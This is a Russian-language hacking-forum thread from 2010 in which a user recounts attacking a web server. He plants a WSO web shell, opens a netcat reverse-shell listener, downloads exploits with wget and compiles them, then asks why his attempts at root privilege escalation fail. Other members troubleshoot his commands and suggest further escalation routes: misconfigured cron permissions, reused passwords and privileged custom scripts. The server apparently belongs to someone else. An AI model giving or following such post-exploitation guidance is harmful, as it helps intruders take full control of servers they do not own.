ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

[Проблема при получении рута сервера!]
  #1  
Старый 03.06.2010, 16:57
Аватар для 3Mind
3Mind
Новичок
Регистрация: 16.08.2009
Сообщений: 26
Провел на форуме:
95169

Репутация: 6
Отправить сообщение для 3Mind с помощью ICQ
По умолчанию [Проблема при получении рута сервера!]

Привет всем.
Пишу уже вторую подобную тему на этом форуме...
Проблема заключается в том что я не могу получить права рута на сервере.
Юзаю разные эксплоиты но в итоге получаю различные ошибки при исполнении эксплоита, преимущественно такую "Permission denied"
Также при подключении через бэк-коннект к netcat появляется сообщение: "sh: no job control in this shell"

Очень хотел бы разобраться и выяснить что же я делаю не так, для этого полностью опишу последовательность выполняемых мною действий:
1. Захожу в netcat и открываю порт на прослушку, вот такой командой:
-l -p 7878
2. Далее захожу в шелл (использую WSO) и выбираю бэк-конект на свою машину (на порт который открыл на прослушку в netcat'е)
3. Получаю эксплоит из веба (командой wget http://site.ru/exploit.tar), либо сохраняю в файл на своем компьютере с расширением "c", а потом загружаю его на целевой сервер посредством шелла.
4. Если сплоит в единственном файле на "с" то последовательность моих команд из-под netcat'а следующая:
gcc exploit.c -o exploit
chmod -x exploit
./exploit
5. Если сплоит не один и лежит в архиве тогда делаю так:
tar exploit.tar
cd exploit
./run.sh

Вот собственно и все хотелось бы услышать дельный совет в чем может быть моя ошибка, сразу оговорюсь что это уже второй шелл с данной проблемой, еще ни одного рута я получить не смог.
P.S.
id
uid=48(apache) gid=48(apache) groups=48(apache)
uname -a
Linux 159794-app1.***.org 2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31 11:01:10 E
DT 2009 i686 i686 i386 GNU/Linux
 
Ответить с цитированием

  #2  
Старый 03.06.2010, 19:41
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
преимущественно такую "Permission denied"
не нужно лить сплойт в папку /tmp или /var/tmp.

Цитата:
появляется сообщение: "sh: no job control in this shell"
это не страшно и в порядке вещей.

ну во-первых можно и без chmod, если скомпилил из сорцов, и вобще-то надо chmod +x exploit

а во вторых - ищи другой сплойт)
 
Ответить с цитированием

  #3  
Старый 03.06.2010, 19:56
Аватар для 3Mind
3Mind
Новичок
Регистрация: 16.08.2009
Сообщений: 26
Провел на форуме:
95169

Репутация: 6
Отправить сообщение для 3Mind с помощью ICQ
По умолчанию

Цитата:
Сообщение от $n@ke  
не нужно лить сплойт в папку /tmp или /var/tmp.
я не храню сплоит в папке /tmp, он у меня лежит в папке с одним из сайтов...

Цитата:
Сообщение от $n@ke  
ну во-первых можно и без chmod, если скомпилил из сорцов, и вобще-то надо chmod +x exploit
да, да так и делаю просто ошибся когда тут писал. =)

Цитата:
Сообщение от $n@ke  
а во вторых - ищи другой сплойт)
я уже сплоитов 20 попробовал не один не подошел, поэтому и стал думать что может я что-то неправильно делаю.
Посоветуй что нибудь, хотябы где искать, milw0rm.com я уже облазил ничего не нашел подходящего, также искал через exploitsearch.com, тоже никакого результата.
 
Ответить с цитированием

  #4  
Старый 03.06.2010, 20:05
Аватар для overxor
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию

ядро патченое, ищи другие пути получения рута
 
Ответить с цитированием

  #5  
Старый 03.06.2010, 23:44
Аватар для 3Mind
3Mind
Новичок
Регистрация: 16.08.2009
Сообщений: 26
Провел на форуме:
95169

Репутация: 6
Отправить сообщение для 3Mind с помощью ICQ
По умолчанию

Цитата:
Сообщение от overxor  
ядро патченое, ищи другие пути получения рута
а какими способами помимо эксплоитов можно получить права рута?
 
Ответить с цитированием

  #6  
Старый 04.06.2010, 03:24
Аватар для Ins3t
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

overxor хотел сказать, что нужно поискать эксплоиты не под ядро, а под конкретные операционные системы и их сервисы.

Последний раз редактировалось Ins3t; 04.06.2010 в 03:28..
 
Ответить с цитированием

  #7  
Старый 05.06.2010, 18:01
Аватар для overxor
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию

Да Ins3t прав. Смотри права на системные файлы (к примеру /etc/crontab. Если есть не стандартные записи следуй по ним. Часто бывает что на сами исполняемые скрипты стоят не правильные права) . Пробуй одинаковые пароли. Ищи самописные сервисы, скрипты исполняемые с наивысшими правами.
 
Ответить с цитированием
Ответ


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Перехват Gsm пакетов SNIFF Сотовый фрикинг 16 27.12.2009 22:25
Lineage 2 Chronicle 4 Inferno Болталка 1 02.02.2006 16:44
химия своими руками silveran Болталка 43 11.01.2006 22:05
Коды silveran Сотовый фрикинг 4 18.10.2005 14:37



TEST QR: []
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ